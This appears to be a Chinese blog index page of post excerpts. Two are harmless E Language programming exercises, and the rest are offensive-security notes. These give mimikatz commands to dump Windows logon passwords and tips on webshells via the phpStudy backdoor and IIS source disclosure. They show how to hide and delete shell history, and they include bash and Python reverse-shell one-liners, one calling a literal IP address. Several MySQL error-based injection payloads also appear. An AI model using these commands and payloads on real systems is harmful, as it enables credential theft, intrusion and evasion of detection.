摘要:
.版本 2 .程序集 窗口程序集_启动窗口 .程序集变量 程序集_学生姓名, 文本型, , "0" .程序集变量 程序集_学生成绩, 整数型, , "0" .子程序 __启动窗口_创建完毕 .子程序 _按钮1_被单击 .局部变量 成员数量, 整数型 .局部变量 i, 整数型 .局部变量 成绩总和, 阅读全文
摘要:
.版本 2 .程序集 窗口程序集_启动窗口 .子程序 _按钮1_被单击 .局部变量 循环次数, 整数型 .局部变量 要循环的数字, 整数型 编辑框1.内容 = “” .计次循环首 (9, 循环次数) .计次循环首 (循环次数, 要循环的数字) 编辑框1.加入文本 (到文本 (循环次数) + “X” 阅读全文
摘要:
一、获取密码# privilege::debug sekurlsa::logonpasswords mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit 一般我会使用bat @echo offmimik 阅读全文
摘要:
老版本的iis环境 index.asp::$data 可爆源码 phpstudy后门直接写马 [space]set +o history 针对你的工作关闭历史记录,并且由于空格的缘故,该命令本身也不会被记录 history | grep "keyword" history -d [num] 删除指定 阅读全文
摘要:
bash -i >& /dev/tcp/ip/3333 0>&1 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('149.28.133.203',333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1... 阅读全文
摘要:
注入: MariaDB [car]> select * from simcms_cars limit 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,user())),1);ERROR 1105 (HY000): XPATH syntax 阅读全文
摘要:
mysql> select * from web_member_data where Oid='1ogout′and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' and Status=0;Empty set 改用union mysql> 阅读全文
摘要:
Msql注入方式 发现网上都很多就收集了一下. 代码审计学习记录 0x00-报错注入 mysql报错注入,我们有时候会遇到没有正常数据回显的注入.这时候就需要报错注入来获得我们需要的数据. 我们经常用到的有floor(),updatexml(),extractvalue()通过查找资料发现还有一些函 阅读全文